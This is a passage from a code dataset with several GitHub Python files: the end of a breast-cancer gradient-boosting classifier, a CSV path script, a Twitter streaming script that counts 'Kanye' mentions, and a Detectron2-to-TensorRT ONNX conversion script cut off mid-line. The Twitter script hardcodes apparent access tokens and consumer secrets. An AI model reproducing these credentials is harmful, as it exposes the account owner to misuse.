0.27828778773713747, #####0.8165,\n# subsample = 0.9480390573398242,\n# random_state = 10\n# )\n\n#############################5555555RD\n # n_estimators = 237,\n # max_depth = 34,\n # min_samples_leaf = 86,\n # min_samples_split = 22,\n # learning_rate =0.6443744115487993, #####0.8165,\n # subsample = 0.9105421033225315,\n # random_state = 10\n # )\n#########################555555BO\n # n_estimators = 474,\n # max_depth = 28,\n # min_samples_leaf = 87,\n # min_samples_split = 89,\n # learning_rate =0.027136389286726015, #####0.8165,\n # subsample = 0.8719086882161583,\n # random_state = 10\n # )\n####################666666RD 最优\n # n_estimators = 130,\n # max_depth = 23,\n # min_samples_leaf = 94,\n # min_samples_split = 54,\n # learning_rate =0.0829094998990422, #####0.8165,\n # subsample = 0.8176170806599637,\n # random_state = 10\n # )\n#####################666666BO\n # n_estimators = 302,\n # max_depth = 28,\n # min_samples_leaf = 31,\n # min_samples_split = 61,\n # learning_rate = 0.04164996932068887, #####0.8165,\n # subsample = 0.9028945206061637,\n # random_state = 10\n # )\n#########################77777RD\n # n_estimators = 153,\n # max_depth = 29,\n # min_samples_leaf = 22,\n # min_samples_split = 10,\n # learning_rate = 0.03722959187506328, #####0.8165,\n # subsample = 0.8825137316466605,\n # random_state = 10\n # )\n######################777777BO\n # n_estimators=122,\n # max_depth=44,\n # min_samples_leaf=73,\n # min_samples_split=41,\n # learning_rate=0.07692109714557302, #####0.8165,\n # subsample=0.8825137316466605,\n # random_state=10\n # )\n # ########################8888RD\n # n_estimators=414,\n # max_depth=7,\n # min_samples_leaf=19,\n # min_samples_split=77,\n # learning_rate=0.2860336309242806, #####0.8165,\n # subsample=0.9933219217119194,\n # random_state=10\n # )\n ##########################8888BO\n # n_estimators=238,\n # max_depth=16,\n # min_samples_leaf=70,\n # min_samples_split=84,\n # learning_rate=0.6954629752796418, #####0.8165,\n # subsample=0.999219920154008,\n # random_state=10\n # )\n\n # ####################999999RD\n # n_estimators=254,\n # max_depth=7,\n # min_samples_leaf=78,\n # min_samples_split=13,\n # learning_rate=0.0760937193688753, #####0.8165,\n # subsample=0.9636631827836868,\n # random_state=10\n # )\n\n # ####################99999BO\n # n_estimators=375,\n # max_depth=14,\n # min_samples_leaf=72,\n # min_samples_split=26,\n # learning_rate=0.04850690819245295, #####0.8165,\n # subsample= 0.9077637360771138,\n # random_state=10\n # )\n###########################10 RD\n # n_estimators=316,\n # max_depth=29,\n # min_samples_leaf=94,\n # min_samples_split=19,\n # learning_rate=0.04850690819245295, #####0.8165,\n # subsample=0.9588579405215747,\n # random_state=10\n # )\n\n\n ###########################10 BO\n # n_estimators=196,\n # max_depth=36,\n # min_samples_leaf=91,\n # min_samples_split=15,\n # learning_rate=0.013129646271213751, #####0.8165,\n # subsample= 0.9050781844584811,\n # random_state=10\n # )\n\n\n clf_gbr = gbr.fit(x_train, y_train)\n y_gbr_pred = clf_gbr.predict(x_valid)\n y_gbr_pred_t = clf_gbr.predict(x_test)\n balance6 = balance(y_gbr_pred, y_valid, y_gbr_pred_t, y_test)\n gbdt_b_acc.append(balance6)\n auc_gbr = roc_auc_score(y_test, y_gbr_pred_t)\n gbdt_auc.append(auc_gbr)\n gbr_confusion = confusion_matrix(y_test, y_gbr_pred_t)\n\n # print(\"balance GBDT:\" + str(balance6))\n # print(\"AUC_gbr:\" + str(auc_gbr))\n # print(\"gbr confusion:\")\n acc,ses,spc,prc,f1 = metrics(gbr_confusion)\n gbdt_acc.append(acc)\n 
gbdt_ses.append(ses)\n gbdt_spc.append(spc)\n gbdt_prc.append(prc)\n gbdt_f1.append(f1)\n\nave_acc = np.mean(gbdt_acc)\nave_b_acc= np.mean(gbdt_b_acc)\nave_auc = np.mean(gbdt_auc)\nave_ses = np.mean(gbdt_ses)\nave_spc =np.mean(gbdt_spc)\nave_prc = np.mean(gbdt_prc)\nave_f1= np.mean(gbdt_f1)\n\n# std_acc = np.std(gbdt_acc)\n# std_b_acc= np.std(gbdt_b_acc)\n# std_auc = np.std(gbdt_auc)\n# std_ses = np.std(gbdt_ses)\n# std_spc =np.std(gbdt_spc)\n# std_prc = np.std(gbdt_prc)\n# std_f1= np.std(gbdt_f1)\n\n\n# std_acc = np.var(gbdt_acc)\n# std_b_acc= np.var(gbdt_b_acc)\n# std_auc = np.var(gbdt_auc)\n# std_ses = np.var(gbdt_ses)\n# std_spc =np.var(gbdt_spc)\n# std_prc = np.var(gbdt_prc)\n# std_f1= np.var(gbdt_f1)\n\nprint(\"acc:\"+ str(ave_acc))\nprint(\"b_acc:\" + str(ave_b_acc))\nprint(\"auc:\" + str(ave_auc))\nprint(\"ses:\" + str(ave_ses))\nprint(\"spc:\" + str(ave_spc))\nprint(\"prc: \"+ str(ave_prc))\nprint(\"f1:\" + str(ave_f1))\n\n# print(\"acc:\"+ str(std_acc))\n# print(\"b_acc:\" + str(std_b_acc))\n# print(\"auc:\" + str(std_auc))\n# print(\"ses:\" + str(std_ses))\n# print(\"spc:\" + str(std_spc))\n# print(\"prc: \"+ str(std_prc))\n# print(\"f1:\" + str(std_f1))\n\n\n\n\n\n\n", "repo_name": "cherry567/breast_cancer_classification", "sub_path": "Classification/Classifier.py", "file_name": "Classifier.py", "file_ext": "py", "file_size_in_byte": 17140, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pandas.read_csv", "line_number": 177, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 187, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 195, "usage_type": "call"}, {"api_name": "sklearn.ensemble.GradientBoostingClassifier", "line_number": 280, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 491, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 493, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 505, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 506, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 507, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 508, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 509, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 510, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 511, "usage_type": "call"}]}
+{"seq_id": "32791378455", "text": "import pandas as pd \nimport yaml\nimport pathlib as pt \n\ndef angio_modify (df):\n \n print (df , df.shape)\n angioloader_list=[]\n for ind in df.index : \n path = df['images_path'][ind]\n p = pt.Path(path).parents[0]\n angio_loader_path=pt.Path(p)/\"angio_loader_header.json\"\n \n angioloader_list.append(angio_loader_path)\n df[\"angio_loader_header\"]=angioloader_list\n return df \n \n \n \n\ndef main():\n \n config = None\n with open('config.yaml') as f: # reads .yml/.yaml files\n config = yaml.safe_load(f)\n \n df=pd.read_csv(config['data']['dataset_csv']) \n new=angio_modify(df)\n new.to_csv(config['data']['dataset_csv'])\n \n\n\nif __name__ == \"__main__\":\n main()", "repo_name": "RazvanAVESALON/PROIECT_ANGIOGRAFII", "sub_path": "utils/ModifyCSV.py", "file_name": "ModifyCSV.py", "file_ext": "py", "file_size_in_byte": 747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pathlib.Path", "line_number": 11, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 12, "usage_type": "call"}, {"api_name": "yaml.safe_load", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 27, "usage_type": "call"}]}
+{"seq_id": "70562329128", "text": "from tweepy.streaming import StreamListener\nfrom tweepy import OAuthHandler\nfrom tweepy import Stream\nimport json\n# import pandas as pd\nimport re\nimport time\nfrom pythonosc import osc_message_builder\nfrom pythonosc import udp_client\nimport argparse\n# import matplotlib.pyplot as plt\n\n# Based on http://adilmoujahid.com/posts/2014/07/twitter-analytics/\n\naccess_token = \"377135231-oGgtj8unrSCSaxqsehC80g9BZCiukT9fpdnnB1y7\"\naccess_token_secret = \"XucJ82KGGWpHAite0K5DLjQa9bz41zC1TQa0wL3wCwbSs\"\nconsumer_key = \"IZ8u1kNdtQTPYs1F3DdcsF5ty\"\nconsumer_secret = \"WhrhP4GknpNJcY6ZGX2USb13PBGSjSBR7NJJcDFAVIyJlkTw7r\"\n\ntime = time.time()\nprint(time)\n\nclass StdOutListener(StreamListener):\n\n def on_data(self, data):\n m = 0.0\n # print data\n try:\n data = json.loads(data)\n regex = re.compile(r\"[Kk]anye\")\n m = regex.findall(data[\"text\"])\n if(len(m) == 0):\n print(data[\"text\"])\n # print(data[\"entities\"][\"hashtags\"])\n print(len(m))\n # print(data[\"text\"])\n except:\n pass\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--ip\", default=\"127.0.0.1\",\n help=\"The ip of the OSC server\")\n parser.add_argument(\"--port\", type=int, default=6448,\n help=\"The port the OSC server is listening on\")\n args = parser.parse_args()\n\n client = udp_client.SimpleUDPClient(args.ip, args.port)\n message_to_send = float(len(m))\n client.send_message(\"/wek/inputs\", message_to_send)\n\n # print(\"========\")\n return True\n\n def on_error(self, status):\n print(status)\n\nif __name__ == '__main__':\n\n #This handles Twitter authetification and the connection to Twitter Streaming API\n l = StdOutListener()\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n stream = Stream(auth, l)\n\n #This line filter Twitter Streams to capture data by the keywords: 'python', 'javascript', 'ruby'\n stream.filter(track=['Kanye', 'kanye'])\n", "repo_name": "aurbanski/I-FeatExt-Urbanski", "sub_path": "Assignment5.py", "file_name": "Assignment5.py", "file_ext": "py", "file_size_in_byte": 2096, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 20, "usage_type": "call"}, {"api_name": "tweepy.streaming.StreamListener", "line_number": 23, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 29, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 30, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 40, "usage_type": "call"}, {"api_name": "pythonosc.udp_client.SimpleUDPClient", "line_number": 47, "usage_type": "call"}, {"api_name": "pythonosc.udp_client", "line_number": 47, "usage_type": "name"}, {"api_name": "tweepy.OAuthHandler", "line_number": 61, "usage_type": "call"}, {"api_name": "tweepy.Stream", "line_number": 63, "usage_type": "call"}]}
+{"seq_id": "70315458087", "text": "import os\nimport re\nimport sys\nimport argparse\nimport logging\nimport cv2\nimport onnx_graphsurgeon as gs\nimport numpy as np\nimport onnx\nfrom onnx import shape_inference\nimport torch\n\ntry:\n from detectron2.engine.defaults import DefaultPredictor\n from detectron2.modeling import build_model\n from detectron2.config import get_cfg\n from detectron2.structures import ImageList\nexcept ImportError:\n print(\"Could not import Detectron 2 modules. Maybe you did not install Detectron 2\")\n print(\"Please install Detectron 2, check https://github.com/facebookresearch/detectron2/blob/main/INSTALL.md\")\n sys.exit(1)\n\nimport onnx_utils\n\nlogging.basicConfig(level=logging.INFO)\nlogging.getLogger(\"ModelHelper\").setLevel(logging.INFO)\nlog = logging.getLogger(\"ModelHelper\")\n\n\nclass DET2GraphSurgeon:\n def __init__(self, saved_model_path, config_file, weights):\n \"\"\"\n Constructor of the Model Graph Surgeon object, to do the conversion of a Detectron 2 Mask R-CNN exported model\n to an ONNX-TensorRT parsable model.\n :param saved_model_path: The path pointing to the exported Detectron 2 Mask R-CNN ONNX model.\n :param config_file: The path pointing to the Detectron 2 yaml file which describes the model.\n :param config_file: Weights to load for the Detectron 2 model.\n \"\"\"\n\n def det2_setup(config_file, weights):\n \"\"\"\n Create configs and perform basic setups.\n \"\"\"\n cfg = get_cfg()\n cfg.merge_from_file(config_file)\n cfg.merge_from_list([\"MODEL.WEIGHTS\", weights])\n cfg.freeze()\n return cfg\n\n # Import exported Detectron 2 Mask R-CNN ONNX model as GraphSurgeon object.\n self.graph = gs.import_onnx(onnx.load(saved_model_path))\n assert self.graph\n log.info(\"ONNX graph loaded successfully\")\n\n # Fold constants via ONNX-GS that exported script might've missed.\n self.graph.fold_constants()\n\n # Set up Detectron 2 model configuration.\n self.det2_cfg = det2_setup(config_file, weights)\n\n # Getting model characteristics.\n self.fpn_out_channels = self.det2_cfg.MODEL.FPN.OUT_CHANNELS\n self.num_classes = self.det2_cfg.MODEL.ROI_HEADS.NUM_CLASSES\n self.first_NMS_max_proposals = self.det2_cfg.MODEL.RPN.POST_NMS_TOPK_TEST\n self.first_NMS_iou_threshold = self.det2_cfg.MODEL.RPN.NMS_THRESH\n self.first_NMS_score_threshold = 0.01\n self.first_ROIAlign_pooled_size = self.det2_cfg.MODEL.ROI_BOX_HEAD.POOLER_RESOLUTION\n self.first_ROIAlign_sampling_ratio = self.det2_cfg.MODEL.ROI_BOX_HEAD.POOLER_SAMPLING_RATIO\n self.first_ROIAlign_type = self.det2_cfg.MODEL.ROI_BOX_HEAD.POOLER_TYPE\n self.second_NMS_max_proposals = self.det2_cfg.TEST.DETECTIONS_PER_IMAGE\n self.second_NMS_iou_threshold = self.det2_cfg.MODEL.ROI_HEADS.NMS_THRESH_TEST\n self.second_NMS_score_threshold = self.det2_cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST\n self.second_ROIAlign_pooled_size = self.det2_cfg.MODEL.ROI_MASK_HEAD.POOLER_RESOLUTION\n self.second_ROIAlign_sampling_ratio = self.det2_cfg.MODEL.ROI_MASK_HEAD.POOLER_SAMPLING_RATIO\n self.second_ROIAlign_type = self.det2_cfg.MODEL.ROI_MASK_HEAD.POOLER_TYPE\n self.mask_out_res = 28\n\n # Model characteristics.\n log.info(\"Number of FPN output channels is {}\".format(self.fpn_out_channels))\n log.info(\"Number of classes is {}\".format(self.num_classes))\n log.info(\"First NMS max proposals is {}\".format(self.first_NMS_max_proposals))\n log.info(\"First NMS iou threshold is {}\".format(self.first_NMS_iou_threshold))\n log.info(\"First NMS score threshold is {}\".format(self.first_NMS_score_threshold))\n 
log.info(\"First ROIAlign type is {}\".format(self.first_ROIAlign_type))\n log.info(\"First ROIAlign pooled size is {}\".format(self.first_ROIAlign_pooled_size))\n log.info(\"First ROIAlign sampling ratio is {}\".format(self.first_ROIAlign_sampling_ratio))\n log.info(\"Second NMS max proposals is {}\".format(self.second_NMS_max_proposals))\n log.info(\"Second NMS iou threshold is {}\".format(self.second_NMS_iou_threshold))\n log.info(\"Second NMS score threshold is {}\".format(self.second_NMS_score_threshold))\n log.info(\"Second ROIAlign type is {}\".format(self.second_ROIAlign_type))\n log.info(\"Second ROIAlign pooled size is {}\".format(self.second_ROIAlign_pooled_size))\n log.info(\"Second ROIAlign sampling ratio is {}\".format(self.second_ROIAlign_sampling_ratio))\n log.info(\"Individual mask output resolution is {}x{}\".format(self.mask_out_res, self.mask_out_res))\n\n self.batch_size = None\n\n def sanitize(self):\n \"\"\"\n Sanitize the graph by cleaning any unconnected nodes, do a topological resort, and fold constant inputs values.\n When possible, run shape inference on the ONNX graph to determine tensor shapes.\n \"\"\"\n\n for i in range(3):\n count_before = len(self.graph.nodes)\n self.graph.cleanup().toposort()\n try:\n for node in self.graph.nodes:\n for o in node.outputs:\n o.shape = None\n model = gs.export_onnx(self.graph)\n model = shape_inference.infer_shapes(model)\n self.graph = gs.import_onnx(model)\n except Exception as e:\n log.info(\"Shape inference could not be performed at this time:\\n{}\".format(e))\n try:\n self.graph.fold_constants(fold_shapes=True)\n except TypeError as e:\n log.error(\"This version of ONNX GraphSurgeon does not support folding shapes, please upgrade your \"\n \"onnx_graphsurgeon module. Error:\\n{}\".format(e))\n raise\n\n count_after = len(self.graph.nodes)\n if count_before == count_after:\n # No new folding occurred in this iteration, so we can stop for now.\n break\n\n def get_anchors(self, sample_image):\n \"\"\"\n Detectron 2 exported ONNX does not contain anchors required for efficientNMS plug-in, so they must be generated\n \"offline\" by calling actual Detectron 2 model and getting anchors from it.\n :param sample_image: Sample image required to run through the model and obtain anchors.\n Can be any image from a dataset. Make sure listed here Detectron 2 preprocessing steps\n actually match your preprocessing steps. 
Otherwise, behavior can be unpredictable.\n Additionally, anchors have to be generated for a fixed input dimensions,\n meaning as soon as image leaves a preprocessor and enters predictor.model.backbone() it must have\n a fixed dimension (1344x1344 in my case) that every single image in dataset must follow, since currently\n TensorRT plug-ins do not support dynamic shapes.\n \"\"\"\n # Get Detectron 2 model config and build it.\n predictor = DefaultPredictor(self.det2_cfg)\n model = build_model(self.det2_cfg)\n\n # Image preprocessing.\n input_im = cv2.imread(sample_image)\n raw_height, raw_width = input_im.shape[:2]\n image = predictor.aug.get_transform(input_im).apply_image(input_im)\n image = torch.as_tensor(image.astype(\"float32\").transpose(2, 0, 1))\n\n # Model preprocessing.\n inputs = [{\"image\": image, \"height\": raw_height, \"width\": raw_width}]\n images = [x[\"image\"].to(model.device) for x in inputs]\n images = [(x - model.pixel_mean) / model.pixel_std for x in images]\n imagelist_images = ImageList.from_tensors(images, 1344)\n\n # Get feature maps from backbone.\n features = predictor.model.backbone(imagelist_images.tensor)\n\n # Get proposals from Region Proposal Network and obtain anchors from anchor generator.\n features = [features[f] for f in predictor.model.proposal_generator.in_features]\n det2_anchors = predictor.model.proposal_generator.anchor_generator(features)\n\n # Extract anchors based on feature maps in ascending order (P2->P6).\n p2_anchors = det2_anchors[0].tensor.detach().cpu().numpy()\n p3_anchors = det2_anchors[1].tensor.detach().cpu().numpy()\n p4_anchors = det2_anchors[2].tensor.detach().cpu().numpy()\n p5_anchors = det2_anchors[3].tensor.detach().cpu().numpy()\n p6_anchors = det2_anchors[4].tensor.detach().cpu().numpy()\n final_anchors = np.concatenate((p2_anchors,p3_anchors,p4_anchors,p5_anchors,p6_anchors))\n\n return final_anchors\n\n def save(self, output_path):\n \"\"\"\n Save the ONNX model to the given location.\n :param output_path: Path pointing to the location where to write out the updated ONNX model.\n \"\"\"\n self.graph.cleanup().toposort()\n model = gs.export_onnx(self.graph)\n output_path = os.path.realpath(output_path)\n os.makedirs(os.path.dirname(output_path), exist_ok=True)\n onnx.save(model, output_path)\n log.info(\"Saved ONNX model to {}\".format(output_path))\n\n def update_preprocessor(self, batch_size):\n \"\"\"\n Remove all the pre-processing nodes in the ONNX graph and leave only the image normalization essentials.\n :param batch_size: The batch size to use for the ONNX graph.\n \"\"\"\n # Set graph inputs.\n self.batch_size = batch_size\n self.height = self.graph.inputs[0].shape[1]\n self.width = self.graph.inputs[0].shape[2]\n\n input_shape = [self.batch_size, 3, self.height, self.width]\n self.graph.inputs[0].shape = input_shape\n self.graph.inputs[0].dtype = np.float32\n self.graph.inputs[0].name = \"input_tensor\"\n\n self.sanitize()\n log.info(\"ONNX graph input shape: {} [NCHW format set]\".format(self.graph.inputs[0].shape))\n\n # Find the initial nodes of the graph, whatever the input is first connected to, and disconnect them.\n for node in [node for node in self.graph.nodes if self.graph.inputs[0] in node.inputs]:\n node.inputs.clear()\n\n # Get input tensor.\n input_tensor = self.graph.inputs[0]\n\n # Create preprocessing Sub node and connect input tensor to it.\n sub_const = np.expand_dims(np.asarray([255 * 0.406, 255 * 0.456, 255 * 0.485], dtype=np.float32), axis=(1, 2))\n sub_out = 
self.graph.op_with_const(\"Sub\", \"preprocessor/mean\", input_tensor, sub_const)\n\n # Find first Div node and connect to output of Sub node.\n div_node = self.graph.find_node_by_op(\"Div\")\n log.info(\"Found {} node\".format(div_node.op))\n div_node.inputs[0] = sub_out[0]\n\n # Find first Conv and connect preprocessor directly to it.\n conv_node = self.graph.find_node_by_op(\"Conv\")\n log.info(\"Found {} node\".format(conv_node.op))\n conv_node.inputs[0] = div_node.outputs[0]\n\n # Reshape nodes tend to update the batch dimension to a fixed value of 1, they should use the batch size instead.\n for node in [node for node in self.graph.nodes if node.op == \"Reshape\"]:\n if type(node.inputs[1]) == gs.Constant and node.inputs[1].values[0] == 1:\n node.inputs[1].values[0] = self.batch_size\n\n def NMS(self, boxes, scores, anchors, background_class, score_activation, max_proposals, iou_threshold, nms_score_threshold, user_threshold, nms_name=None):\n # Helper function to create the NMS Plugin node with the selected inputs.\n # EfficientNMS_TRT TensorRT Plugin is suitable for our use case.\n # :param boxes: The box predictions from the Box Net.\n # :param scores: The class predictions from the Class Net.\n # :param anchors: The default anchor coordinates.\n # :param background_class: The label ID for the background class.\n # :param max_proposals: Number of proposals made by NMS.\n # :param score_activation: If set to True - apply sigmoid activation to the confidence scores during NMS operation,\n # if false - no activation.\n # :param iou_threshold: NMS intersection over union threshold, given by self.det2_cfg.\n # :param nms_score_threshold: NMS score threshold, given by self.det2_cfg.\n # :param user_threshold: User's given threshold to overwrite default NMS score threshold.\n # :param nms_name: Name of NMS node in a graph, renames NMS elements accordingly in order to eliminate cycles.\n\n if nms_name is None:\n nms_name = \"\"\n else:\n nms_name = \"_\" + nms_name\n\n # Set score threshold.\n score_threshold = nms_score_threshold if user_threshold is None else user_threshold\n\n # NMS Outputs.\n nms_output_num_detections = gs.Variable(name=\"num_detections\"+nms_name, dtype=np.int32, shape=[self.batch_size, 1])\n nms_output_boxes = gs.Variable(name=\"detection_boxes\"+nms_name, dtype=np.float32,\n shape=[self.batch_size, max_proposals, 4])\n nms_output_scores = gs.Variable(name=\"detection_scores\"+nms_name, dtype=np.float32,\n shape=[self.batch_size, max_proposals])\n nms_output_classes = gs.Variable(name=\"detection_classes\"+nms_name, dtype=np.int32,\n shape=[self.batch_size, max_proposals])\n\n nms_outputs = [nms_output_num_detections, nms_output_boxes, nms_output_scores, nms_output_classes]\n\n # Plugin.\n self.graph.plugin(\n op=\"EfficientNMS_TRT\",\n name=\"nms\"+nms_name,\n inputs=[boxes, scores, anchors],\n outputs=nms_outputs,\n attrs={\n 'plugin_version': \"1\",\n 'background_class': background_class,\n 'max_output_boxes': max_proposals,\n 'score_threshold': max(0.01, score_threshold),\n 'iou_threshold': iou_threshold,\n 'score_activation': score_activation,\n 'class_agnostic': False,\n 'box_coding': 1,\n }\n )\n log.info(\"Created nms{} with EfficientNMS_TRT plugin\".format(nms_name))\n\n return nms_outputs\n\n def ROIAlign(self, rois, p2, p3, p4, p5, pooled_size, sampling_ratio, roi_align_type, num_rois, ra_name):\n # Helper function to create the ROIAlign Plugin node with the selected inputs.\n # PyramidROIAlign_TRT TensorRT Plugin is suitable for our use case.\n # :param 
rois: Regions of interest/detection boxes outputs from preceding NMS node.\n # :param p2: Output of p2 feature map.\n # :param p3: Output of p3 feature map.\n # :param p4: Output of p4 feature map.\n # :param p5: Output of p5 feature map.\n # :param pooled_size: Pooled output dimensions.\n # :param sampling_ratio: Number of sampling points in the interpolation grid used to compute the output value of each pooled output bin.\n # :param roi_align_type: Type of Detectron 2 ROIAlign op, either ROIAlign (vanilla) or ROIAlignV2 (0.5 coordinate offset).\n # :param num_rois: Number of ROIs resulting from ROIAlign operation.\n # :param ra_name: Name of ROIAlign node in a graph, renames ROIAlign elements accordingly in order to eliminate cycles.\n\n # Different types of Detectron 2's ROIAlign ops require coordinate offset that is supported by PyramidROIAlign_TRT.\n if roi_align_type == \"ROIAlignV2\":\n roi_coords_transform = 2\n elif roi_align_type == \"ROIAlign\":\n roi_coords_transform = 0\n\n # ROIAlign outputs.\n roi_align_output = gs.Variable(name=\"roi_align/output_\"+ra_name, dtype=np.float32,\n shape=[self.batch_size, num_rois, self.fpn_out_channels, pooled_size, pooled_size])\n\n # Plugin.\n self.graph.plugin(\n op=\"PyramidROIAlign_TRT\",\n name=\"roi_align_\"+ra_name,\n inputs=[rois, p2, p3, p4, p5],\n outputs=[roi_align_output],\n attrs={\n 'plugin_version': \"1\",\n 'fpn_scale': 224,\n 'pooled_size': pooled_size,\n 'image_size': [self.height, self.width],\n 'roi_coords_absolute': 0,\n 'roi_coords_swap': 0,\n 'roi_coords_transform': roi_coords_transform,\n 'sampling_ratio': sampling_ratio,\n }\n )\n log.info(\"Created {} with PyramidROIAlign_TRT plugin\".format(ra_name))\n\n return roi_align_output\n\n def process_graph(self, anchors, first_nms_threshold=None, second_nms_threshold=None):\n \"\"\"\n Processes the graph to replace the GenerateProposals and BoxWithNMSLimit operations with EfficientNMS_TRT\n TensorRT plugin nodes and ROIAlign operations with PyramidROIAlign_TRT plugin nodes.\n :param anchors: Anchors generated from sample image \"offline\" by Detectron 2, since anchors are not provided\n inside the graph.\n :param first_nms_threshold: Override the 1st NMS score threshold value. If set to None, use the value in the graph.\n :param second_nms_threshold: Override the 2nd NMS score threshold value. If set to None, use the value in the graph.\n \"\"\"\n def backbone():\n \"\"\"\n Updates the graph to replace all ResizeNearest ops with ResizeNearest plugins in backbone.\n \"\"\"\n # Get final backbone outputs.\n p2 = self.graph.find_node_by_op_name(\"Conv\", \"/backbone/fpn_output2/Conv\")\n p3 = self.graph.find_node_by_op_name(\"Conv\", \"/backbone/fpn_output3/Conv\")\n p4 = self.graph.find_node_by_op_name(\"Conv\", \"/backbone/fpn_output4/Conv\")\n p5 = self.graph.find_node_by_op_name(\"Conv\", \"/backbone/fpn_output5/Conv\")\n\n\n return p2.outputs[0], p3.outputs[0], p4.outputs[0], p5.outputs[0]\n\n def proposal_generator(anchors, first_nms_threshold):\n \"\"\"\n Updates the graph to replace all GenerateProposals Caffe ops with one single NMS for proposals generation.\n :param anchors: Anchors generated from sample image \"offline\" by Detectron 2, since anchors are not provided\n inside the graph\n :param first_nms_threshold: Override the 1st NMS score threshold value. 
If set to None, use the value in the graph.\n \"\"\"\n # Get nodes containing final objectness logits.\n p2_logits = self.graph.find_node_by_op_name(\"Flatten\", \"/proposal_generator/Flatten\")\n p3_logits = self.graph.find_node_by_op_name(\"Flatten\", \"/proposal_generator/Flatten_1\")\n p4_logits = self.graph.find_node_by_op_name(\"Flatten\", \"/proposal_generator/Flatten_2\")\n p5_logits = self.graph.find_node_by_op_name(\"Flatten\", \"/proposal_generator/Flatten_3\")\n p6_logits = self.graph.find_node_by_op_name(\"Flatten\", \"/proposal_generator/Flatten_4\")\n\n # Get nodes containing final anchor_deltas.\n p2_anchors = self.graph.find_node_by_op_name(\"Reshape\", \"/proposal_generator/Reshape_1\")\n p3_anchors = self.graph.find_node_by_op_name(\"Reshape\", \"/proposal_generator/Reshape_3\")\n p4_anchors = self.graph.find_node_by_op_name(\"Reshape\", \"/proposal_generator/Reshape_5\")\n p5_anchors = self.graph.find_node_by_op_name(\"Reshape\", \"/proposal_generator/Reshape_7\")\n p6_anchors = self.graph.find_node_by_op_name(\"Reshape\", \"/proposal_generator/Reshape_9\")\n\n # Concatenate all objectness logits/scores data.\n scores_inputs = [p2_logits.outputs[0], p3_logits.outputs[0], p4_logits.outputs[0], p5_logits.outputs[0], p6_logits.outputs[0]]\n scores_tensor = self.graph.layer(name=\"scores\", op=\"Concat\", inputs=scores_inputs, outputs=['scores'], attrs={'axis': 1})[0]\n # Unsqueeze to add 3rd dimension of 1 to match tensor dimensions of boxes tensor.\n scores = self.graph.unsqueeze(\"scores_unsqueeze\", scores_tensor, [2])[0]\n\n # Concatenate all boxes/anchor_delta data.\n boxes_inputs = [p2_anchors.outputs[0], p3_anchors.outputs[0], p4_anchors.outputs[0], p5_anchors.outputs[0], p6_anchors.outputs[0]]\n boxes = self.graph.layer(name=\"boxes\", op=\"Concat\", inputs=boxes_inputs, outputs=['anchors'], attrs={'axis': 1})[0]\n\n # Convert the anchors from Corners to CenterSize encoding.\n anchors = np.matmul(anchors, [[0.5, 0, -1, 0], [0, 0.5, 0, -1], [0.5, 0, 1, 0], [0, 0.5, 0, 1]])\n anchors = anchors / [self.width, self.height, self.width, self.height] # Normalize anchors to [0-1] range\n anchors = np.expand_dims(anchors, axis=0)\n anchors = anchors.astype(np.float32)\n anchors = gs.Constant(name=\"default_anchors\", values=anchors)\n\n # Create NMS node.\n nms_outputs = self.NMS(boxes, scores, anchors, -1, False, self.first_NMS_max_proposals, self.first_NMS_iou_threshold, self.first_NMS_score_threshold, first_nms_threshold, 'rpn')\n\n return nms_outputs\n\n def roi_heads(rpn_outputs, p2, p3, p4, p5, second_nms_threshold):\n \"\"\"\n Updates the graph to replace all ROIAlign Caffe ops with one single pyramid ROIAlign. Eliminates CollectRpnProposals\n DistributeFpnProposals and BatchPermutation nodes that are not supported by TensorRT. Connects pyramid ROIAlign to box_head\n and connects box_head to final box head outputs in a form of second NMS. In order to implement mask head outputs,\n similar steps as in box_pooler are performed to replace mask_pooler. Finally, reimplemented mask_pooler is connected to\n mask_head and mask head outputs are produced.\n :param rpn_outputs: Outputs of the first NMS/proposal generator.\n :param p2: Output of p2 feature map, required for ROIAlign operation.\n :param p3: Output of p3 feature map, required for ROIAlign operation.\n :param p4: Output of p4 feature map, required for ROIAlign operation.\n :param p5: Output of p5 feature map, required for ROIAlign operation.\n :param second_nms_threshold: Override the 2nd NMS score threshold value. 
If set to None, use the value in the graph.\n \"\"\"\n # Create ROIAlign node.\n box_pooler_output = self.ROIAlign(rpn_outputs[1], p2, p3, p4, p5, self.first_ROIAlign_pooled_size, self.first_ROIAlign_sampling_ratio, self.first_ROIAlign_type, self.first_NMS_max_proposals, 'box_pooler')\n\n # Reshape node that prepares ROIAlign/box pooler output for Gemm node that comes next.\n box_pooler_shape = np.asarray([-1, self.fpn_out_channels*self.first_ROIAlign_pooled_size*self.first_ROIAlign_pooled_size], dtype=np.int64)\n box_pooler_reshape = self.graph.op_with_const(\"Reshape\", \"box_pooler/reshape\", box_pooler_output, box_pooler_shape)\n\n # Get first Gemm op of box head and connect box pooler to it.\n first_box_head_gemm = self.graph.find_node_by_op_name(\"Gemm\", \"/roi_heads/box_head/fc1/Gemm\")\n first_box_head_gemm.inputs[0] = box_pooler_reshape[0]\n\n # Get final two nodes of box predictor. Softmax op for cls_score, Gemm op for bbox_pred.\n cls_score = 